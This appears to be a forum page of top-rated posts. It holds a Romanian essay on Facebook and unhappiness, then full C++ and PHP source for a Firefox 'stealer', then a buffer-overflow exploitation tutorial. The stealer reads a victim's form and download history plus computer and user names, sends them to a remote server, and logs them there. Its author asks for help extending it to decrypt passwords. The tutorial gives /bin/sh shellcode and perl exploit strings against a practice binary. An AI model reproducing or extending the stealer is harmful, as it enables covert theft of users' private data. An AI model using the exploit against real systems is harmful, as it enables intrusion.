Leaderboard
Popular Content
Showing content with the highest reputation on 06/26/14 in all areas
-
Omul comunica prin cuvinte in jur de 7%, tonalitate 38% si limbajul trupului 55 %. Pe internet comunicam doar cu cei 7%, iar restul vine din imaginatie. Imaginatia tinde sa idealizeze tot ce se afla in jurul nostru. Noi vedem pozele altora, ne inchipuim ca au o viata minunata si incercam sa parem la fel. Incercam sa parem fericiti, ne punem poze cand zambim, ne punem statusuri ca suntem feiriciti. Toata fericirea noastra e falsa, putem trai o adevarata drama in realitate si pe internet sa parem cei mai fericiti. Frumusetea bolnava e ca noi stim cum suntem cu adevarat, nefericiti poate, dar despre ceilalti nu stim. Si asa traim intr-o iluzie, un joc bolnav, ne hranim cu impresii pana la autodistrugere. Cei mai nefericiti oameni sunt cei care incearca din rasputeri sa para cat mai fericiti, e o chestiune dovedita stiintific. Fetele sunt printre cele mai afectate de efectul facebook. Exista si un efect invers, rar am vazut sa se vorbeasca despre asta. Aflati sub presiunea iluziilor prezentate pe paginile de facebook ale prietenilor, unii nici nu au curaj sa isi puna macar o poza la profil, chiar daca si-ar dori si ei. Asta pentru ca realitatea in care ei traiesc nu se apropie nici macar la un sfert din ceea ce ei obseva la altii. Nu e de ras, multi dintre acesti oameni sufera, sunt bolnavi, au nevoie de ajutor. E impresionant cata distrugere si suferinta poate provoca facebook. Cei care sunteti intr-o astfel de situatie, sunteti depresivi, suferiti de dependente, consumati in exces jocuri pe calculator sau aveti alte probleme emotionale. Ma puteti contacta, va dau ceva materiale sa cititi.1 point
-
Here is my mozilla firefox stealer, it steals download lists and form history. It can easly be extended and used to steal other datas from a mozilla firefox. I used sqlite and used a sqlite.lib file which i compiled. I used web based communication. I generally used WinApi functions. Datas are sent to a php file and be logged in a server. Please don't forget to give permissions Thanks JeFF for his help about widestring and ansi-string help. Thanks frankl3fr6nk for kind beta testing Thanks icarus for his helps to me about learning malware fundamentals We can develop this stealer together with peoples who have knowledge about these. For instance - my first question is how to decrypt to encrypted password - How to do this code more compatible with other operating systems - How to reduce the size I attached sqlite3.h and sqlite3.c and sqlite.lib config.h #define HOST "www.xxx.com" // Do not change its format.. #define PORT 80 #define PAGE_NAME "stealer.php" // Do not change its format.. functions.h #include <Windows.h> #include <WinInet.h> #include "config.h" void Request (const char* server,const char* input); char* getComputerName(); getFormHistory.h #include "config.h" #include "sqlite3.h" void getFormHistory(char* path); getDownloads.h #include "config.h" #include "sqlite3.h" void getDownloads(char *path); functions.cpp #include "functions.h" void Request (const char* server,const char* input) { HINTERNET hInternet; HINTERNET hConnect; HINTERNET hRequest; hInternet = InternetOpenA("Open",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,INTERNET_FLAG_DONT_CACHE); if (hInternet != NULL) { hConnect = InternetConnectA(hInternet,server,PORT,NULL,NULL,INTERNET_SERVICE_HTTP,0,1u); if (hConnect != NULL) { hRequest = HttpOpenRequestA(hConnect,"GET",input,NULL,NULL,0,INTERNET_FLAG_KEEP_CONNECTION,1); if (hRequest != NULL) { HttpSendRequestA(hRequest,"Content-Type: application/x-www-form-urlencoded\r\n",-1L,NULL,0); } } } InternetCloseHandle(hInternet); InternetCloseHandle(hConnect); InternetCloseHandle(hRequest); } char* getComputerName() { DWORD computerNameSize = 512; char* computerName; computerName = (char*)malloc(512*sizeof(char)); GetComputerNameA(computerName, &computerNameSize); DWORD UserNameSize = 512; char* userName; userName = (char*)malloc(512*sizeof(char)); GetUserNameA(userName, &UserNameSize); char* fullComputerName = (char*)malloc(1024*sizeof(char)); ZeroMemory(fullComputerName,1024*sizeof(char)); strcat(fullComputerName,(const char*)computerName); strcat(fullComputerName,userName); return fullComputerName; } getFormHistory.cpp #include "getFormHistory.h" #include "functions.h" void getFormHistory(char* path) { char *zErrMsg = 0; int error; sqlite3_stmt *res; const char *tail; char *formhistory; char* pathCopy; pathCopy = (char*)malloc(256*sizeof(char)); ZeroMemory(pathCopy,256*sizeof(char)); strcpy(pathCopy,path); strcat(pathCopy,"\\formhistory.sqlite"); pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\fomrhistory.sqlite")+1] = '\00'; sqlite3 *db; // sqlite3 db struct error = sqlite3_open(pathCopy, &db); if(!error) { formhistory = (char*)malloc(429496729); ZeroMemory(formhistory,429496729); sqlite3_prepare_v2(db,"select * from moz_formhistory",1000,&res,&tail); if (error == SQLITE_OK) { while (sqlite3_step(res) == SQLITE_ROW) { if(strlen(formhistory) > 6000) break; strcat(formhistory,(char*)sqlite3_column_text(res, 1)); strcat(formhistory,"--"); strcat(formhistory,(char*)sqlite3_column_text(res, 2)); strcat(formhistory,"*-*-*"); } } } sqlite3_close(db); char* computerName; computerName = (char*)malloc(1024*sizeof(char)); ZeroMemory(computerName,1024*sizeof(char)); computerName = getComputerName(); char *data; data = (char*)malloc(429496729*sizeof(char)); ZeroMemory(data,429496729*sizeof(char)); strcpy(data,PAGE_NAME); strcat(data,"?computerName="); strcat(data,computerName); strcat(data,"-formhistory"); strcat(data,"&formhistory="); strcat(data,formhistory); Request(HOST,data); free(computerName); free(formhistory); } getDownlaods.cpp #include "getDownloads.h" #include "functions.h" void getDownloads(char *path) { char *zErrMsg = 0; int error; sqlite3_stmt *res; const char *tail; char *downloads; char* pathCopy; pathCopy = (char*)malloc(256*sizeof(char)); ZeroMemory(pathCopy,256*sizeof(char)); strcpy(pathCopy,path); strcat(pathCopy,"\\downloads.sqlite"); pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\downloads.sqlite")+1] = '\00'; sqlite3 *db; // sqlite3 db struct error = sqlite3_open(pathCopy, &db); if(!error) { downloads = (char*)malloc(429496729); ZeroMemory(downloads,429496729); sqlite3_prepare_v2(db,"select * from moz_downloads",1000,&res,&tail); if (error == SQLITE_OK) { while (sqlite3_step(res) == SQLITE_ROW) { strcat(downloads,(char*)sqlite3_column_text(res, 1)); strcat(downloads,"*-*-*"); } } } sqlite3_close(db); char* computerName; computerName = (char*)malloc(1024*sizeof(char)); ZeroMemory(computerName,1024*sizeof(char)); computerName = getComputerName(); char *data; data = (char*)malloc(429496729*sizeof(char)); ZeroMemory(data,429496729*sizeof(char)); strcpy(data,PAGE_NAME); strcat(data,"?computerName="); strcat(data,computerName); strcat(data,"-downloads"); strcat(data,"&downloads="); strcat(data,downloads); Request(HOST,data); free(computerName); free(downloads); } main.cpp #include <windows.h> #include "getFormHistory.h" #include "getDownloads.h" // Thanks to LeFF from opensc.ws int main() { HANDLE hFile; DWORD dwBytesRead = 0; char ReadBuffer[513] = {0}; char* appDataStr = (char*)malloc(256*sizeof(char)); int strSize = ExpandEnvironmentStringsA("%APPDATA%",appDataStr, 256 ); char* iniFile; iniFile = (char*)malloc(512*sizeof(char*)); ZeroMemory(iniFile,512); strcat((char*)appDataStr,"\\Mozilla\\Firefox\\profiles.ini"); strcat((char*)iniFile,(char*)appDataStr); hFile = CreateFileA(iniFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if (hFile != INVALID_HANDLE_VALUE) { ReadFile(hFile, ReadBuffer, 512, &dwBytesRead, NULL); } CloseHandle(hFile); char *pathStart; ReadBuffer[dwBytesRead] = '\00'; pathStart = strstr(ReadBuffer,"Path="); pathStart = pathStart + 5*sizeof(char); int size = strlen(pathStart)-(strlen("Default=1")+4); char *realPath; realPath = (char*)malloc(256*sizeof(char)); ZeroMemory(realPath,256*sizeof(char)); strncat(realPath,pathStart,size-2); // 4 for \t\n and \t\n getDownloads(realPath); // Get downloads getFormHistory(realPath); // Get form history //each function should keep realPath variable same. free(appDataStr); free(iniFile); return 0; } stealer.php <html> <body> <?php $downloads = $_GET["downloads"]; $computerName = $_GET["computerName"]; $formhistory = $_GET["formhistory"]; $handle = fopen($computerName, 'a'); if(isset($downloads)) { $downloads = str_replace("*-*-*","\t\n", $downloads); fwrite($handle, $downloads); fwrite($handle, "\t\n\t\n"); fwrite($handle, "-----downloads done-----\t\n\t\n"); fclose($handle); } else if(isset($formhistory)) { $formhistory = str_replace("*-*-*","\t\n", $formhistory); fwrite($handle, $formhistory); fwrite($handle, "\t\n\t\n"); fwrite($handle, "-----formhistory done-----\t\n\t\n"); fclose($handle); } ?> </body> </html>1 point
-
Prerequisites: Basic/Intermediate knowledge of Assembly Language Basic/Intermediate knowledge of GDB (GNU Debugger) Which is the debugger I will be using for this tutorial A good understanding of the C/C++ Languages A good understanding of how the stack is ordered and processed in a computer Introduction: A Buffer Overflow, is a vulnerability which is encountered when a program writing data to a buffer, exceeds the bounds of the buffer, causing the excess data to overflow into adjacent memory. Picture this, we have created a C program, in which we have initialized a variable, buffer, of type char, with a buffer size of 500 bytes: int main(void) { char buffer[500]; } And in this program, we take input from the command line, which is then copied to a buffer, via the C function strcpy(). int main(int argc, char *argv[]) { char buffer[500]; strcpy(buffer, argv[1]); } Notice, that we have not checked whether or not the length of argv[1] is within the buffers range of 500 bytes; Why not? Well, you'd think that like most modern day programming languages, the strcpy() function would check this before copying the data to the buffer? This is not the case, and is a common misconception made my novice programmers who are not aware of the security implications regarding certain functions, which is why this vulnerability exists and may continue to exist further into the future. Now, you may be wondering how you could possibly exploit such a vulnerability, I mean what good is writing a few bytes into memory.. Well, on it's own, nothing, but if you were to overwrite the return pointer of the function which you are within, you could ultimately alter the flow of code execution within the program that you are targeting. For example, in the program above, say that theoretically the memory location of buffer starts at 0x00000000, and ends at 0x0000007D (which should have 500 bytes of space), and that the return pointer is located 524 Bytes away from that, it would take an input of 1024 Bytes, e.g 1024 "A"'s, to get "behind" the return pointer, which means that you can then overwrite the next 4 bytes of memory defined as the return pointer, and then watch as it is POP'ed into the EIP register, and executes whatever code, malicious or otherwise, which may lie on the other end address you specify. Now we get on to the really fun bit, where we actually get to exploit a program which is susceptible to this exploit vector. If you are going to attempt this on your own computer, firstly, make sure you are NOT using Windows >= Vista, as Windows >= Vista, have protections in place, such as ESP (Executable Space Protection), ASLR (Address Space Layout Randomization), and various other exploit prevention techniques. It would be more advisable to use operating systems such as Linux, Unix, and other Unix based operating systems to get this working, as it's easier to disable the countermeasures put in place by running a command such as: sudo echo > /proc/sys/kernel/randomize_va_space Which will disable your systems ASLR until you reboot, which is not an option in Windows operating systems (that I'm aware of). If you do not have access to a Linux operating system, or are too lazy to dual boot or install a VM, you can SSH into various wargaming servers (such as Smash The Stack or Over The Wire) to practice the skills learned here in a legal and safe way, with minimalistic effort, for all you lazy h4xx0rs out there. Now, on with thy spl0itz. I'm going to use a simple source code from Smash The Stack : Blowfish, which does not currently have a webpage. Here is the code: #include <stdio.h> int main(int argc, char * argv[]) { char buf[256]; if(argc == 1) { printf("Usage: %s input\n", argv[]); exit(); } strcpy(buf,argv[1]); printf("%s", buf); } As you can see, it follows the same principles as the example code used previously in the tutorial, but with some extra validation to make sure that argv[1] is present. So, lets compile this code and continue. In this tutorial, I'm going to use GCC (GNU C Compiler) from the GNU Compiler Collection to compile my code. I will compile using the following command: gcc bof.c -g -fno_stack_protector -o bof Which will compile the code with required headers for gdb to be able to debug it, and also disable gcc's stack protection in systems which have patched gcc to have it enabled by default. Once we have compiled our vulnerable code, we can open the executable, which I have called "bof", with GDB, for debugging, using the command: gdb bof Which should give you something similar to this: Now that we are in GDB, we can start getting into the real exploitation; firstly, we want to make sure that we can run the executable correctly from GDB. We can do this simply by typing "run", which should return: If it returns an error instead, then try moving to a folder where you have sufficient permissions. Assuming that the program executes, then exits normally, we can carry on. We now need to establish how many bytes we have to enter until we have control over the return pointer. There is two main ways to do this: Trial and error or A string which never repeats a sequence of bytes, allowing for easy identification I tend to just use trial and error, as the second option requires the Metasploit Framework, which may not be available on machines such as the ones you will encounter while wargaming. run perl -e 'print "A" x 512' which for me, causes a segmentation fault, which occurs when EIP is set to an address which cannot be executed, or is outside of the available memory for the program. So, now that we know the return pointer resides within 512 bytes of the start of our buffer, we can start to slowly decrement the amount of "A"'s that we print, until the program executes without error, and returns "Program Exited Normally.", which for me, occurs at 268 Bytes, which is only 12 Bytes away from the end of our buffer. This means that the return pointer lies between 268 Bytes and 273 Bytes. Armed with this knowledge, we can move on to adding in our shellcode, which is comprised of the opcodes of Assembly instructions. The shellcode I will be using for this tutorial is a /bin/sh shellcode written by a fairly recently retired member of SoldierX, jip, which will drop you into a bash shell which has the permissions of the program you are attacking. Here it is: \x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 So, what do we do now? Well, we have to incorporate this into our exploit. we do this by first adding the shellcode into the Perl string, giving us this bash / Perl code: So, for trial and error, we want to type run: run perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' And then we must take away the amount of Bytes the shellcode contains, from the overall amount of "A"'s (or whatever filler you are using), so that we still retain control over the return pointer. In order to do this, we must replace the number "268", with "(268 - 26)", where 26 is the amount of Bytes in the shellcode (Every 2 Bytes in the shellcode equates to one Byte in Hex, the "\x" signifies the following 2 Bytes are a hexadecimal Byte). This will give is this code: run perl -e 'print "A" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' This command on it's own will not actually give us a working exploit; for that, we need to find out the address of where our shellcode is stored. But before we get into the nitty gritty with Assembly Language, I want to make 2 more adjustments to our current exploit: A nop sled An address "placeholder", as the longer or shorter the exploit is, the more the memory allocations shift around. by giving us a placeholder, we are securing a permanent place in memory The altered code will look like this: run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xff\xff\xff\xff"' Now, we've got an almost working exploit, all we have to do now, is find that memory address, to do that, we have to run "disas main", which will give us the following result: This is where you will need to have some knowledge of Assembly to get through As you can see, we have a full dump of the programs Assembly code; so, what do we do with it? Well, first, we have to look for the call to strcpy(), which should be pretty easy, as it's marked in the Assembly code as "strcpy@plt". So once he know where the strcpy() is called, we can set a break point to pause before it is called, and examine the stack. To do this, run the command "break *main+79". Run the program again, and we should get something like: which signifies that the program is waiting at the specified breakpoint. We now want to examine the top two pointers on the stack, which are the arguments which will be passed to the strcpy() function. To do this we type "x/2x $esp", which will give us: The two addresses after the colon are the addresses that we are interested in. To view what data they hold, we have to type "x/s 0xbfffd6d0", which will give us: Which is clearly not our shellcode, so this must be the buffer before we have written to it. So, if we type "x/s 0xbfffd974", we should see our shellcode. Hmm.. Well that's odd.. No shellcode. Oh yeah, it's further down, past the Nops. Press enter once and we should see it. That's it! We know where our shellcode is stored, so now we can take the address "0xbfffd974" and substitute it right into the exploit.. right? Nope, we must swap the byte order around due to a "phenomena" known as Little Endian byte order, which causes byte orders to switch around inside addresses. So, we switch around the Bytes to give us "74 d9 ff bf", which then need to have "\x" prepended, as they are hex bytes, which will give us "\x74\xd9\xff\xbf". This can now be substituted into our exploit to give us the Perl code: run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x74\xd9\xff\xbf"' Which, when run, should give us a shell (Note that sometimes GDB does not have the permissions required, so you should run it outside GDB, by typing "quit", then replacing "run" with the name of the binary): WE DID IT! From now on, you will have a shell in the specified application (until you choose to quit)! Once you do quit, however, the program will crash, and most likely cause Denial Of Service in programs such as web servers, which are responsible for serving data to clients. I'm not going to cover how to alter the flow of execution so that the program continues to function correctly, as this is meant to be a tutorial explaining the basics of the buffer overflow, how the concept works and is exploited, so, that is the end of my Buffer Overflow Exploitation tutorial, I hope that you learned how to exploit buffer overflows quickly and easily (if not, feel free to pm me with any questions or problems and I'll make sure to get back to you), thanks a lot. Author: xAMNESIAx Source1 point
-
-1 points